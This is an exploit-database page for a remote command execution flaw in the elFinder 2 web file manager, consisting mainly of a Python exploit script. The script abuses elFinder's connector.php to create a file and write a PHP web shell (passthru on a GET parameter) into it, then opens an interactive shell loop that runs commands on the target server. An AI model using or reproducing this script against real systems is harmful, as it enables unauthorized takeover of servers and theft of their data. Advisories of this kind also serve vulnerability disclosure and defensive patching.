elFinder 2 Remote Command Execution

2015.05.08
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98
CWE-78

#[+] Author: TUNISIAN CYBER #[+] Title: elFinder 2 Remote Command Execution (Via File Creation) Vulnerability #[+] Date: 06-05-2015 #[+] Vendor: https://github.com/Studio-42/elFinder #[+] Type: WebAPP #[+] Tested on: KaliLinux (Debian) #[+] Twitter: @TCYB3R #[+] Time Line: # 03-05-2015:Vulnerability Discovered # 03-05-2015:Contacted Vendor # 04-05-2015:No response # 05-05-2015:No response # 06-05-2015:No response # 06-05-2015:Vulnerability published import cookielib, urllib import urllib2 import sys print"\x20\x20+-------------------------------------------------+" print"\x20\x20| elFinder Remote Command Execution Vulnerability |" print"\x20\x20| TUNISIAN CYBER |" print"\x20\x20+-------------------------------------------------+" host = raw_input('\x20\x20Vulnerable Site:') evilfile = raw_input('\x20\x20EvilFileName:') path=raw_input('\x20\x20elFinder s Path:') tcyber = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(tcyber)) create = opener.open('http://'+host+'/'+path+'/php/connector.php?cmd=mkfile&name='+evilfile+'&target=l1_Lw') #print create.read() payload = urllib.urlencode({ 'cmd' : 'put', 'target' : 'l1_'+evilfile.encode('base64','strict'), 'content' : '<?php passthru($_GET[\'cmd\']); ?>' }) write = opener.open('http://'+host+'/'+path+'/php/connector.php', payload) #print write.read() print '\n' while True: try: cmd = raw_input('[She3LL]:~# ') execute = opener.open('http://'+host+'/'+path+'/admin/js/plugins/elfinder/files/'+evilfile+'?cmd='+urllib.quote(cmd)) reverse = execute.read() print reverse; if cmd.strip() == 'exit': break except Exception: break sys.exit()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top